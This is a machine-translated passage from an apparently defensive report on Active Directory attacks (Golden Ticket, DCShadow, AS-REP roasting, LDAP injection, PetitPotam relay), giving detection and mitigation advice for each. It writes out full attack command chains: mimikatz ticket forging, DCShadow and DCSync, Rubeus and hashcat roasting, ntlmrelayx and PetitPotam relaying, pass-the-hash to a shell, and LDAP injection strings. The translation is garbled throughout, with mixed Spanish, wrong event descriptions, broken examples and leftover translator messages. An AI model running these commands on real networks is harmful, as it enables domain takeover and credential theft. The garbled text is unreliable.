kerberos::golden: the fully qualified domain name of the domain, the security identifier of the domain
(SID), the hash of the password of the KRBTGT user (using AES-256, and alternatively
AES-128, NTLMoRC4), the username to impersonate, the group RID to include in the ticket,
the first being the main user group, and the ptt indicator to indicate whether the forged ticket should
be injected into the current session instead of saving it to a file:

PD>[Link]"kerberos::golden /domain:[Link]
/sid:S-1-5-21-5840559-2756745051-1363507867
/aes256:ffa8bd983a5a03618bdf577c2d79a467265f140ba339b89cc0a9c1bfdb4747f5 /id:500 /
usuario:Administrador inexistente /grupos:Número de grupo1, Número de grupo2 /ptt"

User Non-existing administrator

Domain [Link] (DOMAIN)
S.I.D. S-1-5-21-5840559-2756745051-1363507867
User identification 500
Group identification: *513 2668
Service key: ffa8bd983a5a03618bdf577c2d79a467265f140ba339b89cc0a9c1bfdb4747f5 -
aes256_hmac
-> Boleto : Pass the ticket
. . .
Golden ticket sent successfully to 'NonExistentUser@[Link]'
current session

Please note that with the /id indicator, the opponent indicated the user identification for which they want
Create the ticket. In this case, the attacker passes the value 500 to the /id indicator to create an account.
administrator. The username can be anything, as indicated in the example.

Step 3: Use of the forged kerberos ticket

The attacker can use the forged ticket to gain access to the resources integrated with
Kerberos. The TGT is signed and encrypted with the real KRBTGT password hash, which makes it
a valid form of identification in the eyes of any domain controller. Then, the controller of
domain will issue tickets for the ticket granting service (TGS) based on the TGT.

As the attacker gains more information about the environment, they can use the forged tickets.
to access applications, databases, or other resources that use Active Directory for authentication
and authorization. The attacker can target specific groups by including their RID in the spoofing process
of tickets. For example, they might discover the group 'MSSQL Administrators' with the RID
corresponding during a discovery phase, which could provide them access to valuable databases
data [31].
Machine Translated by Google

Detection methods for the golden ticket attack

Id. de evento 4769 : se solicitó un vale de servicio de Kerberos.

• Campos de descripción clave: nombre de la cuenta, nombre del servicio, dirección del cliente

Event ID 4624: Successfully logged into an account.

• Campos de descripción clave: Nombre de la cuenta, Dominio de la cuenta, ID de inicio de sesión

Event ID 4627: identifies the account that requested the logon.

• Key description fields: security ID, account name, account domain, login ID

Mitigation techniques for the golden ticket attack

To protect against Kerberoasting attacks, it is recommended to take measures to limit adversaries' access.
and make it difficult for them to obtain the hash of the password of the user KRBTGT.

This can be achieved through the following actions [31], [32]:

Mitigation Technique 1: Restriction of administrative privileges through limits

of security

Organizations should not allow users to have administrative privileges through the limits of
security. For example, an attacker who gains access to a workstation should not be able to escalate their privileges
to point to the domain controller.

Mitigation technique 2: Minimization of elevated privileges

Service accounts with high privileges, such as domain administrators, should be granted only when necessary.
By limiting the number of these accounts, organizations can reduce the number of targets for an attacker that
search for the KRBTGT hash.

Mitigation technique 3: Periodically change the password of the KRBTGT account.

It is important to change the password of the KRBTGT user periodically and immediately after any
change in the personnel responsible for the administration of Active Directory.
The password must be changed twice, with an interval of 12 to 24 hours between the two changes, to avoid interruptions in
the service.
Machine Translated by Google

Attack technique 4:

DCShadow Attack

A DC Shadow attack involves compromising the Active Directory environment by introducing a controller.
unauthorized Domain Controller (DC) on the network and then replicate the changes from the controllers
legitimate domain to the unauthorized. The attack consists of six steps.

A DC Shadow attack is a type of attack in an Active Directory environment in which an attacker

introduce an unauthorized domain controller (DC) into the network and replicate the changes from the
legitimate domain controllers. The attacker first makes changes to the environment, such as adding
new objects or modify the existing ones, and then wait for the changes to replicate in the
legitimate domain controllers. They then register the service principal names (SPN) for
the unauthorized domain controller and register it in the namespace of
configuration, which allows it to authenticate and communicate with other controllers
domain. The attacker triggers the replication of the changes made in the controller of
unauthorized domain, which replicates it, allowing changes to persist in the environment.
Finally, the attacker removes the SPNs and the unauthorized domain controller, covering their tracks.
and leaves the environment in a compromised state. This type of attack allows the attacker to persist
and I controlled the network by making changes that are replicated to other domain controllers.
Machine Translated by Google

Tools and techniques for carrying out a DCShadow attack

Adversaries often use Mimikatz as a tool to carry out the DCShadow attack technique.

Tool 1: Mimikatz

Before continuing, we must assume that the attacker has already compromised the credentials of a
Active Directory account with administrative permissions; let's assume the user's name is Bob.
the reason behind this assumption is that an administrative account allows the adversary
make changes in the environment, such as adding a fake domain controller and replicating the changes
from legitimate domain controllers.
Without administrative access, the attacker would not be able to carry out the attack.

A typical DCShadow attack consists of two steps.

Step 1: Elevate SYSTEM privileges and make changes to the object

replicated
The first step is to start the mimidrv service, which provides the necessary privileges to
play the role of a fake domain controller [33]. These initial commands("!+"
They register and start a service called 'mimidrv' and elevate privileges to SYSTEM.

PD> .\[Link] "!+ !ProcessToken"

Below, the adversary executes the following commands [33], [34].

mimikatz #lsadump::dcshadow
/objeto:"CN=Alice,OU=Empleados,DC=sub,DC=dominio,DC=com" /attribute:SidHistory
/value:S-5-1-5-21-2049251289-867822404-1193079966
. . .
**
Startup Server

BindString[0]: ncacn_ip_tcp:<LocationOfFakeServer>[ThePortItListensTo]
RPC link registered
The RPC server is waiting!

== Press Control+C to stop ==

This command is used to specify the fake server for a DCShadow attack.
Machine Translated by Google

The modifier '/object' is used to specify the target user object, in this case, the user 'Alice'.
The '/attribute' modifier is used to specify the attribute that should be modified in the user object.
destination, in this case 'SidHistory'. Finally, the modifier '/value' is used to specify the new value
for the specified attribute, in this case
S-5-1-5-21-2049251289-867822404-1193079966

In the context of a DCShadow attack, this command is used to specify the fake server and target it.
user object to modify its attribute SidHistory with the specified new value. The modified attribute
it can be used to grant the attacker unauthorized access to the target system and information
confidential.

Step 2: send the changes to a real domain controller

In the second step, the adversary has to relaunch Mimikatz as the account 'Bob', which was compromised in
first place. The opponent executes the following command:

mimikatz #lsadump::dcshadow /push

It is expected that the command lsadump::dcshadow /push will carry out a DCShadow attack when registering a controller

of false domain (shadowDC) and send replication data to it. The goal of this attack is to modify the content
from the Active Directory database using the unauthorized domain controller. Once that is
they have confirmed the replication data, the fake domain controller is removed from the registry for cleanup purposes.

Once everything is done, the attacker logs out of the compromised account Bob and logs back in.
session to obtain the updated access token with the modified SID history.

Detection methods for the ShadowDC attack

The only definitive way to identify a DCShadow attack is through network monitoring of the
Remote Procedure Call (RPC) requests DRSUAPI for the operation DRSUAPI_REPLICA_ADD
that originate in systems that are not known to be domain controllers. Another method to detect
DCShadow is through the analysis of Windows event logs, but this approach only
it provides signals of the attack and not the exact changes made by the attacker.

To imitate a domain controller, DCShadow must make changes in Active Directory, such as adding
a new objectNTDDSA a servicePrincipalName of global catalog (GC/<host>) a
a piece of equipment that is not a known domain controller. Once the attack is complete, it
they will eliminate both elements.

When examining events 5136 and 5141 in the Audit Directory Service Changes subcategory of the log
Windows events ([35], [36]), you can look for evidence of the creation and deletion of server objects.
inside the sites.
Machine Translated by Google

Id. de evento 5136: la plataforma de filtrado de Windows ha permitido una conexión.

• Key description fields: security ID, account name, account domain, login ID

Event ID 5141: a directory service object was deleted.

• Key description fields: security ID, account name, account domain, login ID

Mitigation techniques for the DCShadow attack

El ataque DCShadow es un tipo de amenaza persistente avanzada (APT) que aprovecha las funciones y los privilegios
from Active Directory (AD) to maliciously modify data. Since it is not possible to completely eliminate the risk
from this attack, it is important to adopt a multi-layered security approach to mitigate it. Here are some
suggestions that can help you reduce the risk of a successful DCShadow attack:

Mitigation technique 1: Implementation of firewall policies

Use host-based firewalls to limit lateral movement. Make sure that the protocols of
remote administration, such as RDP, should only be accessible from a small set of approved systems and
monitored.

Mitigation technique 2: limit user privileges

It is essential to limit the number of users with administrative privileges through security boundaries. This
helps to minimize the extent to which an attacker can escalate their privileges.

Mitigation Technique 3: Control access to information objects

Restrict the number of users allowed to add computer objects to Active Directory. This
ayuda a evitar cambios no autorizados en la infraestructura de AD.

Mitigation Technique 4: Reduce delegated administrative permissions

Adequately control the integrated privileged groups and delegated administrative permissions to reduce the
risk of abuse.

Mitigation technique 5: Maintain good Active Directory hygiene

The periodic elimination of unused computer sites and objects helps maintain good Active hygiene.
Directory and reduce the attack surface.

By following these mitigation strategies, organizations can better protect themselves against DCShadow attacks and
other types of advanced persistent threats.
Machine Translated by Google

Attack technique 5:

AS-REP Tuesday

The AS-REP roasting technique allows attackers to acquire password hashes of accounts
of users who have disabled previous Kerberos authentication. This method involves the
transmission of an authentication server request message (AS-REQ) to the domain controller
If pre-authentication is disabled, the DC will return an AS-REP message that contains
encrypted data, including a segment encrypted with the user's password hash. Subsequently, the
An attacker can use this information to try to crack the user's password offline.

Under normal circumstances, with pre-authentication activated, the user starts the procedure.
of Kerberos authentication by sending an AS-REQ message to the DC. This message is encrypted with a
timestamp, which is further encrypted with the user's password hash. If the DC decrypts
successfully the timestamp using its stored record of the user's password hash,
will respond with an AS-REP message that includes a Ticket Granting Ticket (TGT), issued by the
Key Distribution Center (KDC). The user then uses this TGT for future requests.
access.
Machine Translated by Google

Tools and techniques for conducting an AS-REP roast attack

Adversaries can use various third-party tools to carry out an AS-REP roasting attack, such as Rubeus.
yEmpire, Kerbrute, Impacket.

Tool: Rubeus

To find all accounts that do not require prior authentication and extract their AS-REP hashes for cracking
offline, an adversary executes the following command.

[Link] as a reproach

To advance the attack a few steps, the attacker can exploit some parameters to extract the data.
in a format that, for example, Hashcat can crack offline:

[Link] as reproast /format:hashcat /outfil[Link]\Temp\[Link]

Please note that the output hash credentials are written to the file called [Link] in the directory.
Next, the adversary takes advantage of Hashcat, specifying the hash mode code for AS hashes.
REP (18200), a hash file and a dictionary to carry out password guessing through brute force.

[Link]-m 18200 c:\Temp\[Link] [Link]

To gain a better understanding of the AS-REP Roasting attack and how it is performed using other methods.
tools, you can visit here [37].

Detection methods for the AS-REP roasting attack

The detection of AS-REP Roasting attacks is crucial to mitigate the risk of password theft. One way to
detecting such attacks is monitoring changes in the configuration that controls whether Kerberos pre-authentication
is enabled.

Id. de evento 4738 : se cambió una cuenta de usuario.

• Key description fields: security ID, account name, account domain, login ID,
ID de seguridad, nombre de cuenta

For example, during the course of an attack of this type, event ID 4738 is generated. This event signifies a request for
ticket for the Kerberos authentication service and covers parameters such as the ticket encryption type (0x17), the options of the
ticket(0x40800010) and the name of the service (krbtgt). The presence of these parameters in the event logs
it can indicate an ongoing AS-REP roasting attack, as this event occurs when the attacker manipulates the
domain objects [38].
Machine Translated by Google

Figure 1. The event ID 4738 [38].

Event ID 5136: A directory service object was modified.

• Campos de descripción clave: ID de seguridad, nombre de cuenta, dominio de cuenta, ID de inicio de sesión, DN,
GUID, clase, nombre para mostrar LDAP

Another option is to monitor event ID 5136, which provides information about the changes made in the
user accounts within a Windows environment. By analyzing the logs of this event, it is possible to identify
any user account whose previous authentication settings have been changed
of Kerberos.
Machine Translated by Google

AS-REP Attack Mitigation Techniques

There are a couple of techniques you can use to mitigate an AS-REP attack.

Mitigation Technique 1: Location of all user accounts

The most effective way to prevent AS-REP roasts is to locate all user accounts that
they are configured without requiring prior Kerberos authentication and enabling this configuration.
This can be done using the following script [39]:

Get-ADUser -Filter * -Properties DoesNotRequirePreAuth | Where-Object

{$_.DoesNotRequirePreAuth -eq $True -and $_.Enabled -eq $True} | Select-Object
'SamAccountName','DoesNotRequirePreAuth'|Sort-Object 'SamAccountName'

The script uses the Get-ADUser cmdlet with a filter to find all user accounts and specifies the
property 'DoesNotRequirePreAuth' in the 'Properties' parameter to retrieve the information
for prior authentication for each account.

The output of the Get-ADUser cmdlet is then piped to the Where-Object cmdlet, which filters the results for
include only accounts where 'DoesNotRequirePreAuth' is equal to $True and 'Enabled' is equal to $True.
Filtered results are then passed to the cmdlet Select-Object, which selects the 'SamAccountName' properties.
'DoesNotRequirePreAuth' for each account. Finally, the selected results are passed to the
cmdlet Sort-Object, which sorts the results by the property 'SamAccountName'.

By enabling Kerberos pre-authentication for these user accounts, it ensures that the controller
a domain can decrypt the timestamp encrypted with the user's password hash. This makes
to make it much more difficult for an attacker to gain access to the user's password hash and carry out
there was an offline cracking attack.

Mitigation technique 2: Implementation of a secure password policy

To protect against AS-REP roasting attacks, it is advisable to implement policies for

secure passwords, especially for privileged accounts, that require the use of long passwords and
complicated. This makes it a challenge for an attacker to decipher the passwords, even if they are stolen.
successfully. The implementation of detailed password policies is an effective first step to
guarantee the security of passwords.
Machine Translated by Google

Mitigation Technique 3: find out the privileges of Active Directory

It is important to identify who has the authority to change the pre-authentication settings.
since it could be temporarily disabled to steal the AS-REP hash and then re-enabled.
The following query will show all the people with access rights to the accounts
without prior authentication [40]:

(Get-ACL "AD:\$((Get-ADUser -Filter 'useraccountcontrol -band

4194304'). Distinguished Name) . Access

The code retrieves the access control list (ACL) from the security descriptor associated with an object.
specific user in Active Directory (AD).

First, filter all user accounts in AD where the value 'useraccountcontrol' is 4194304.
set of decimal bits (which corresponds to the indicator UF_DONT_REQUIRE_PREAUTH)
the attribute userAccountControl ) and retrieves its distinguished name. Then it retrieves the ACL of the descriptor
security of the first user account in the results set using the name
distinguished and stores it in a variable. The last line of code retrieves the access property
of the ACL and the sample, which represents the access rights that are granted or denied to the
security principles specified in the ACL for the target user object.
Machine Translated by Google

Attack Technique 6:

LDAP injection attack

LDAP, an abbreviation for Lightweight Directory Access Protocol, is an application protocol for
open source that is used for directory service authentication. In other words, LDAP is
acts as a cross-platform that maintains a communication language for applications that
they communicate with other directory services that store information about objects and share this
information with other entities on the network. One thing to keep in mind is that LDAP and Active Directory are not the same.
the same; in fact, LDAP is the language that Microsoft Active Directory (AD) understands. Therefore, if you ever
You need to access or authenticate to the data stored in AD, use LDAP to communicate with the server.
of destination.

A LDAP query, on the other hand, is the command that requests a specific directory service for the
information you requested.

By default, you, as a valid account without privileges in AD, can use queries.
LDAP to obtain critical information. For example, if you want to list all users with " Password
never the option expires" enabled, then execute the following LDAP query:

(object category = user) (user account control: 1.2.840.113556.1.4.803: = 65536)

Machine Translated by Google

LDAP injection is a type of vulnerability that allows an attacker to inject malicious code into a
consulta LDAP. Esto puede dar como resultado el acceso no autorizado a información confidencial almacenada
in the LDAP directory or the manipulation of the data stored in the directory. Injection attacks
LDAP issues often occur due to a lack of proper validation and sanitization of input in the
client side, where user-controlled values are directly added to the search filter
LDAP. Attackers can exploit this vulnerability by injecting special characters into the query,
what changes its intended meaning and allows the attacker to bypass authentication controls or
recover confidential information.

Techniques for performing an LDAP injection attack

LDAP injection attacks come in many forms, and some of them are addressed in this text.
If you want to delve deeper into the topic and obtain information on additional types of LDAP injection attacks
that are not mentioned here, follow this link [41].

LDAP Injection Type 1: privilege escalation

The issue of Privilege Escalation refers to the situation in which low-security users
they can access high-level security information. This is achieved through the use of a
injection in the form of a filter that processes the LDAP server.

For example, the attacker may target a directory with low-security documents, such as
["Information/Reports","Information/Upcoming projects"]

The injection, in this case, would be as follows:

Information)(security_level=*))(&(directory=documents

The resulting filter from this injection would be the following.

(&(directory=Information)(security_level=*))(&(directory=Information)
(nivel_seguridad=bajo))

As the LDAP server processes only the first filter, the second filter is ignored and the query that is executed
es"(&(directorio=Información)nivel de seguridad=*)".Esto le permite al atacante obtener acceso a una lista
documents that would otherwise only be accessible to users with a high level of security, although
the attacker does not have the appropriate privileges.
Machine Translated by Google

LDAP Injection Type 2: Access Control Bypass

All login pages contain two fields for user input, one for the name of
user and another for the password. The fields are labeled as USER (username) and
PASSWORD (password). The client provides a username/password pair and LDAP confirms the
existence of this pair by building search filters and sending them to the LDAP server.

The filter is written as (&(USER=Alice)(PASSWORD=PaSsW0rd!+). However, an attacker can manipulate

this by entering a valid username and injecting a sequence after it, effectively omitting
the password verification. Knowing the username, the attacker can enter any string as
the value of the password, which results in the following query being sent to the server:
(&(USER=Alice)(PASSWORD=PaSsW0rd!+)

The LDAP server only processes the first filter, ignoring the second, allowing the attacker to access the
system without a proper password since the query(&(USER=Alice)(&))is always correct.

LDAP Injection Type 3: Information Disclosure

A resource explorer allows the user to see what resources are available in the system, such as a website.
that sells clothes. For example, a user can search for a specific item, such as notebooks or stickers,
to see if they are available for sale. This is done through an LDAP query, like: (|(type=Notebooks)
(type=Stickers)).

However, a hacker can exploit this by injecting the string "uid=*" into the query, which results in
resultado la siguiente consulta: (|(type=Notebooks)(uid=*))(type=Stickers)).

This query will be processed by the LDAP server, showing not only all available jeans but also
all user objects in the system.
Machine Translated by Google

Técnicas de mitigación para un ataque de inyección LDAP

There are a couple of mitigation techniques to prevent a possible LDAP injection attack.

Mitigation Technique 1: Escape all variables using the correct LDAP encoding

Escaping all variables using the correct LDAP encoding is one of the key mitigation techniques.
against LDAP injection attacks. This technique involves encoding all inputs provided by
the user in a way that makes it difficult for attackers to inject malicious payloads into LDAP queries.

Mitigation Technique 2: Distinguished Name Escape

LDAP uses DN, or distinguished name, to store and identify names in its database. A DN
acts as a unique identifier, similar to a username, and can be used to access resources.

A DN consists of several parts, separated by commas. For example, a DN might look like this [42]:

cn=Richard Feynman, ou=Department of Physics, dc=Caltech, dc=edu

Certain characters in a DN are considered special characters and must be escaped or handled.
correctly to avoid problems with the DN. The exhaustive list of special characters in a DN
"
includes # + < > ,; and initial or final spaces.

However, there are also "special" characters that are allowed in distinguished names and it is not
necessary to escape them. These include* ( ) . ~ | @ $ % ^&-
? : { } !'_.[ ] `

It is important to handle special characters properly in a DN to ensure that the DN

it works as expected and to avoid problems or undesirable consequences when using the DN.

Mitigation technique 3: Search filter bypass

In the LDAP database, each DN, or distinguished name, uniquely points to a single entry, which
it can be considered as a row in a relational database management system (RDBMS).
Each entry contains one or more attributes, similar to columns in an RDBMS. The filters of
Search can be used to query the LDAP database and find entries with specific attributes.

The search filters use Polish notation, also known as prefix notation, to
specify the search conditions. For example, the following search filter would return all the
entries in the organizational unit of Physics that have Freeman Dyson or Albert Einstein as their manager [42].
Machine Translated by Google

(&(ou=Physics)(|(manager=cn=Freeman
Dyson,ou=Physics,dc=Caltech,dc=edu)(manager=cn=Albert
Einstein,ou=Physics,dc=Princeton,dc=edu)))

When creating LDAP queries in the application code, it is essential to escape any data that is not from
trust added to the query to avoid security issues. There are two types of LDAP escaping:
encoding for LDAP search and encoding for LDAP DN. The proper way to escape depends on whether the
data is used in a search filter or as a DN as a credential to access
a resource.

Special characters like "(", ")" and "" must be escaped properly when used in a filter.
search to ensure that the query executes as intended. For more information about the
to escape the search filter, refer to document RFC4515 [43].

Additional Defenses

To provide an additional layer of protection against LDAP injection attacks, organizations

they can implement the following defense measures:

Minimum privilege: limit the privileges assigned to the LDAP link account, which is the account used for
access the LDAP directory, to minimize potential damage in the event of a successful attack.

Enable bind authentication: configure the LDAP protocol to require bind authentication, which
verify and authorize the valid credentials provided by the user [44]. However, attackers can still bypass
link authentication through Anonymous Link [45] and Unauthenticated Link [46]. Therefore,
these linking options must also be disabled.

Input validation of the whitelist: implement input validation techniques to detect and prevent
that unauthorized entries are passed to the LDAP query. This can help ensure that only those are used.
approved values in the construction of LDAP queries, which reduces the risk of an injection attack
Successful LDAP. These validation techniques may include the use of regular expressions, data types and
length restrictions, and cross-reference checks with external lists or databases [47].
Machine Translated by Google

Attack Technique 7:
NTLM relay attack of PetitPotam on an asset
Directory Services Certificates (AD CS)

The NTLM relay attack of PetitPotam is a type of cyberattack that exploits the protocol.
inherited Windows NTLM and the MS-EFSRPC protocol. This attack exploits the configuration
insecure default of Active Directory Certificate Services (AD-CS), which does not apply the
Extended Protection for Authentication (EPA).

In this attack, an attacker can trigger domain controller authentication by exploiting

the vulnerability of PetitPotam and relaying it to the AD-CS server to request a certificate for the
domain controller account. With this certificate, the attacker can retrieve a TGT (Ticket
Granting Ticket for the retransmitted domain controller account and performing other operations using
their high privileges. This can lead to a complete takeover of the domain in just a few steps and
potentially allow the attacker to download the domain administrator hashes.

It is important to note that this vulnerability was partially mitigated with an update.
security released by Microsoft on patch Tuesday, May 10, 2022, but an attack is still possible
if an attacker has Active Directory account credentials.
Machine Translated by Google

Techniques to carry out a PetitPotam NTLM relay attack

Active Directory Certificate Services (AD CS)

In the following scenario, we will demonstrate how an adversary can exploit the vulnerability of
LittlePotam to gain full domain administrator privileges without the need for authentication
previous

A typical PetitPotam NTLM Relay attack consists of five steps.

Step 1: Re-broadcasting the AD DC registration webpage

In the first step, the attacker must ensure that [Link] from Impacket is configured to relay.
to the AD DC web registration page.

sudo python3 [Link] -debug -smb2support --target

[Link] --adcs --template KerberosAuthentication
…

SMB server configuration

HTTP server configuration

WCF Server Configuration

Servers started, waiting for connections

Please note that the "--target" indicator specifies the target URL to attack. In this case, the target is
a certificate server connection point. The indicators "--adcs" and "--template KerberosAuthentication"
they indicate that the destination is an Active Directory Certificate Services (ADCS) server and that the tool
It will use a specific authentication template. The indicators '-debug' and '-smb2support' are for purpose of
debugging and compatibility with SMB version 2, respectively.

Step 2: Exploitation of the PetitPotam vulnerability

To exploit the PetitPotam vulnerability, we both need to specify the DC and the attacker's IP.
[Link] can be downloaded from its official GitHub repository [49].

[Link] <listener ip> <destination ip>

Please note that while the listening IP is the attacker's relay IP, the destination IP is the IP of
domain controller targeted by the attacker. Once the adversary exploits the vulnerability of
PetitPotam, the credentials will be transmitted to the AD CD, where the certificate will be enrolled.
Machine Translated by Google

... #See the first step.

Servers started, waiting for connections
...
CERTIFICATE OBTAINED!

[*] Base64 certificate of user DC-101$:

MIIRXQIBAz...LUSHLJCNIKmzEStB/3уе<ZKk31GbxwDU8t8wtx0YayLkKaJB5/c/tanzuJ10r08obkt
The provided text does not contain any translatable content.

Step 3: Obtaining a Ticket Granting Ticket (TGT)

Now that it is registered, the attacker can use this certificate to obtain a Ticket Granting Ticket.
(TGT). For this step, the attacker can take advantage of the tool ke ke oo Rubeus [50]:

Kekeo # base64 /entry:en

. . .
Kekeo #tgt::ask /pfx:<base64 certificate of the relay> /user:DC-101$
/domain:[Link] /ptt

This command successfully authenticates the adversary with the domain.

Step 4: DCSyncing the target user

In this step, the attacker can use Mimikatz to perform a DCSync attack on the user krbtgt.

lsadump::dcsync /dominio:[Link] /usuario:krbtgt

Please note that with the command, the attacker specifies the domain to which
pointing to ("[Link]") and the user to impersonate ("krbtgt"), which is a privileged account in
Active Directory used to perform various administrative tasks, including issuing tickets.
of Kerberos.

The function 'lsadump::dcsync', on the other hand, is used to perform a 'DCSync' attack, which is a type of
of an attack that allows an attacker to simulate the behavior of a domain controller and
recover password hash, Kerberos tickets, and other confidential information from the database
from Active Directory. Therefore, by running this command, the adversary obtains the hash of the
user password krbtgt: 186c026974e59a14040dbc63aa8fb8c4.
Machine Translated by Google

Step 5: Pass the hash

In this step, the adversary can use the [Link] tool from Impacket to pass the hash they obtained in the
fifth step to obtain an interactive shell on the domain controller.

[Link]-hashes :186c026974e59a14040dbc63aa8fb8c4 EXAMPLE/krbtgt@<target-ip>

In simpler terms, these two errors work together to allow someone with limited access to obtain
quickly the complete control of a network or system. Even if the network or system is fully updated with
The latest security patches, these vulnerabilities can still be exploited to cause severe damage in just a few minutes.

Mitigation techniques for an NTLM PetitPotam relay attack

Active Directory Certificate Services (AD CS)

To protect networks against NTLM relay attacks, domain administrators must take measures.
to protect services enabled for NTLM authentication. The PetitPotam threat exploits servers that
they lack protection against NTLM relay attacks in Active Directory Certificate Services (AD CS).
This mitigation guide provides steps for AD CS customers to protect their servers from this type of attack.

If AD CS is used with the following services, your network may be vulnerable:

• Web registration of certification authority • Service

certificate registration website.

Microsoft suggests the following steps to mitigate possible attacks on AD CS servers [51]:

Step 1: enable extended protection for authentication (EPA) for the web enrollment of the certification authority
and the web service for certificate enrollment. This can be done through the Internet Information Manager
Services (IIS), being 'Required' the recommended and safest option.

Step 2: update the [Link] file created by the certificate enrollment web service function, located at
<%windir%>\systemdata\CES<CA Name>_CES_Kerberos\[Link], to reflect the selected EPA configuration.

Step 3: This can be done by adding <extendedProtectionPolicy> with a value of "WhenSupported" or "Always",
according to the EPA configuration in the IIS user interface. The "Always" configuration should be used when the
EPA configuration is set to "Mandatory."

Step 4: enable SSL-only connections by turning on the "Require SSL" option in the IIS Manager.
Machine Translated by Google

Figure 2. Enabling SSL-only connections in the IIS Manager [51]:

Step 5: After completing these steps, it is important to restart IIS to load the changes. This can be done
opening an elevated command prompt window and typing the following command:

iisreset /restart

Please note that this command stops all IIS services and then restarts them.

For more information about the available options for <extendedProtectionPolicy>, see the
Transport of basicHttpBinding. A sample configuration is provided [51]:

TransportWithHeaderClientAuth
seguridad="Transport">
<transporte clientCredentialType="Windows">
<extendedProtectionPolicy policyEnforcement="Siempre" /> </transporte>
<mensaje
clientCredentialType="Ninguno" establezcaSecurityContext="falso" negocieServiceCredential="falso" /
>
</seguridad>
<readerQuotas maxStringContentLength="131072" /> </binding>
Machine Translated by Google

Conclusion

In conclusion, the increasing frequency and sophistication of attacks targeting Active Directory are
evident. The common attacks discussed in this report, such as Pass the Hash, Pass the Ticket,
["Kerberoasting","Golden Ticket","DC Shadow","AS-REP Roasting","LDAP Injection","PetitPotam NTLM Relay"]
Attacks exemplify the countless ways in which adversaries can exploit vulnerabilities.
within an organization's Active Directory infrastructure.

Considering the crucial role that Active Directory plays in regulation of

access to the data and confidential resources of an organization, it is imperative that the
organizations take proactive measures to defend themselves against this type of attack. This
requires a multi-layered approach that incorporates regular security audits, assessments of
vulnerability and continuous monitoring to detect and address threats in real time.

It is crucial to recognize that attackers constantly adapt their tactics, which requires
for organizations to remain vigilant and constantly update their security measures
to stay ahead of emerging threats. By investing in comprehensive security measures and monitoring
by closely monitoring the evolving threat landscape, organizations can mitigate the risk of being
victims of an Active Directory attack.
Machine Translated by Google

References

[MS-ADTS]: Introduction. [Online]. Available:

[Link]

-457b-877c-db97b1e1802f. [Consulted: February 10, 2023]

[2] “Directorio Activo: ¿Qué es? ¿Por qué es importante?”, Intermedia | Intermedia, 10 de marzo de 2022.

[Online]. Available:

[Link]

[Consulted: February 10, 2023]

[3] EB Abid, "Beneficios de Active Directory (pros y contras)", Servicios de infraestructura en la nube,

August 22, 2021. [Online]. Available:

[Link] [Consulted: February 10, 2023]

Benefits of Microsoft 365 and Azure Active Directory for identity management

Technologies, June 22, 2022. [Online]. Available:

[Link]

management/. [Consulted: February 10, 2023]

"DBIR 2022 Report - Teacher's Guide", Verizon Business. [Online]. Available:

[Link]

[Consulted: February 10, 2023]

Cost of a data breach report 2022. [Online]. Available: https://

[Link]/downloads/cas/3R8N1DZJ. [Consulted: February 10, 2023]

Compare Active Directory with Azure Active Directory.

[Link]

compare-azure-ad-to-ad. [Consulted: February 10, 2023]

A. Robbins, "How Azure Active Directory attackers move to on-premises AD", The New

Stack, May 26, 2022. [Online]. Available:

[Link]

[Consulted: February 10, 2023]

GitHub - ParrotSec/mimikatz, GitHub. [Online]. Available:

[Link] [Consulted: February 7, 2023]

Machine Translated by Google

GitHub - Hackplayers/evil-winrm: The latest WinRM shell for hacking/pentesting

GitHub. [Online]. Available: [Link] [Accessed: February 07, 2023]

ProcDump - Sysinternals. [Online]. Available:

[Link] [Consultation: February 7]

2023

"gsecdump". [Online]. Available:

[Link] [Consulted: February 7, 2023]

HC Yuceel, "The credential dumping technique of the MITRE ATT&CK T1003 operating system and its

"Adversary Use", March 23, 2022. [Online]. Available:

[Link]

technique-and-its-opponent-use. [Consulted: February 7, 2023]

5985,5986 - Pentesting WinRM. [Online]. Available:

[Link]

[Consulted: February 7, 2023]

mimikatz > sekurlsa::logon passwords. [Online]. Available:

[Link]

[Link]. [Consulted: February 9, 2023]

"Detection of lateral movement through event log tracking." [Online]. Available:

[Link] [Consulted: February 9, 2023]

J. Warren, "How to detect Pass-the-Hash attacks" [online]. Available:

[Link] [Consulted: February 9, 2023]

Mitigation of Pass-the-Hash (PtH) attacks and other credential theft techniques

." [Online]. Available:

[Link]

Pass-the-Hash (PtH) Attacks and Other Credential Theft

techniques_Spanish.pdf. [Consulted: February 9, 2023]

[19]“GitHub - gentilkiwi/kekeo: Una pequeña caja de herramientas para jugar con Microsoft Kerberos en C,” GitHub.

[Online]. Available: [Link] [Accessed: February 7, 2023]

GitHub - GhostPack/Rubeus: trying to tame the three-headed dog

Available: [Link] [Consulted: February 7, 2023]

Machine Translated by Google

creddump7 Kali Linux . [Online]. Available: [Link]

[Consulted: February 7, 2023]

[22] R. Chandel, "Una guía detallada sobre Rubeus", Piracy articles, May 11, 2022. [Online].

Available: [Link] [Consulted: February 7, 2023]

[23] JasonGerend, "Overview of Kerberos Authentication". [Online]. Available:

[Link]

general description of the action. [Consulted: February 7, 2023]

"Kerberoast". [Online]. Available:

[Link] [Accessed: January 13th]

2023

Kerberoasting Attack, Netwrix. [Online]. Available:

[Link]

[Consulted: January 13, 2023]

"Attack Tutorial: How Kerberoasting Attack Works", Netwrix. [Online]. Available:

[Link] [Consulted: January 13, 2023]

Trick No. 18 of Active Directory concealed persistence: place SPN on administrator accounts for the

Kerberoasting afterword”. [Online]. Available: [Link] [Consulted: February 09, 2023]

[28] S. Metcalf, "Detecting Kerberoasting Activity", Active Directory Security, 5 de febrero de 2017.

[Online]. Available: [Link] [Accessed: February 9, 2023]

"Website". [Online]. Available:

Cracking Kerberos TGS Tickets Using Kerberoasting

[30] K. Mistele, “Impacket Deep Dives vol. 2: Attacking Kerberos - Kyle Mistele,” Medium ,

June 5, 2021. [Online]. Available:

[Link]

dd472a. [Consulted: February 8, 2023]

"Golden Ticket Attack", Netwrix. [Online]. Available:

[Link] [Consulted: February 8, 2023]

Attacks with gold bills: how they work and how to defend against them

Search. [Online]. Available:

[Link]

st-them/. [Consulted: February 9, 2023]

Machine Translated by Google

V. Navali, "Detection of an unauthorized domain controller: DCShadow attack" SentinelOne ,

August 15, 2022. [Online]. Available:

[Link]

ck/. [Consulted: February 8, 2023]

DCShadow Attack using Mimikatz, Netwrix. [Online]. Available:

Accessed:

8 de febrero de 2023]

5136(S): A directory service object was modified, Microsoft. [Online]. Available:

The link provided leads to a page on Microsoft's official documentation about event 513 related to auditing in Windows security threat protection. Unfortunately, I cannot translate the content of that page directly since it requires access to the current data available on that website.

6. [Access: February 10, 2023]

Lateral motion detection through tracking event logs

